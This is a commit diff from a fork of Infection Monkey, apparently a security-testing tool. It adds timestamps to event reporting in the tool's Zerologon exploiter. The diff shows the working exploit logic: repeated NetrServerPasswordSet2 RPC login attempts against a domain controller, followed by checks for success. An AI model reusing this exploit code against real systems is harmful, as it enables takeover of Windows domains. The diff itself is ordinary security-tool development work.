p41275903
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Add timestamps to publish calls

This commit is contained in:
Kekoa Kaaikala 2022-10-07 20:27:14 +00:00
parent 8eb3c94a94
commit 88d2bf7140
1 changed files with 14 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
monkey/infection_monkey/exploit/zerologon.py
View File

@ -187,19 +187,20 @@ class ZerologonExploiter(HostExploiter):
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool: def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt): for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
exploit_attempt_result = self.try_exploit_attempt(rpc_con) exploit_attempt_result, timestamp = self.try_exploit_attempt(rpc_con)
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result) is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result, timestamp)
if is_exploited: if is_exploited:
return True return True
return False return False
def try_exploit_attempt(self, rpc_con) -> Optional[object]: def try_exploit_attempt(self, rpc_con) -> Tuple[Optional[object], float]:
error_message = "" error_message = ""
timestamp = time()
try: try:
exploit_attempt_result = self.attempt_exploit(rpc_con) exploit_attempt_result = self.attempt_exploit(rpc_con)
return exploit_attempt_result return exploit_attempt_result, timestamp
except nrpc.DCERPCSessionError as err: except nrpc.DCERPCSessionError as err:
# Failure should be due to a STATUS_ACCESS_DENIED error. # Failure should be due to a STATUS_ACCESS_DENIED error.
# Otherwise, the attack is probably not working. # Otherwise, the attack is probably not working.
@ -210,12 +211,9 @@ class ZerologonExploiter(HostExploiter):
error_message = f"Unexpected error: {err}" error_message = f"Unexpected error: {err}"
logger.info(error_message) logger.info(error_message)
self._publish_exploitation_event( self._publish_exploitation_event(timestamp, False, error_message=error_message)
success=False,
error_message=error_message,
)
return None return None, timestamp
def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object: def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
request = nrpc.NetrServerPasswordSet2() request = nrpc.NetrServerPasswordSet2()
@ -236,25 +234,24 @@ class ZerologonExploiter(HostExploiter):
request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
request["Authenticator"] = authenticator request["Authenticator"] = authenticator
def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool: def assess_exploit_attempt_result(self, exploit_attempt_result, timestamp: float) -> bool:
if exploit_attempt_result: if exploit_attempt_result:
if exploit_attempt_result["ErrorCode"] == 0: if exploit_attempt_result["ErrorCode"] == 0:
self.report_login_attempt(result=True, user=self.dc_name) self.report_login_attempt(result=True, user=self.dc_name)
_exploited = True _exploited = True
logger.info("Exploit complete!") logger.info("Exploit complete!")
self._publish_exploitation_event(success=True) self._publish_exploitation_event(timestamp, True)
else: else:
self.report_login_attempt(result=False, user=self.dc_name) self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False _exploited = False
error_message = f"Non-zero return code: {exploit_attempt_result['ErrorCode']}." error_message = (
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
"Something went wrong." "Something went wrong."
)
logger.info(error_message) logger.info(error_message)
self._publish_exploitation_event( self._publish_exploitation_event(timestamp, False, error_message=error_message)
success=False,
error_message=error_message,
)
return _exploited return _exploited
return False return False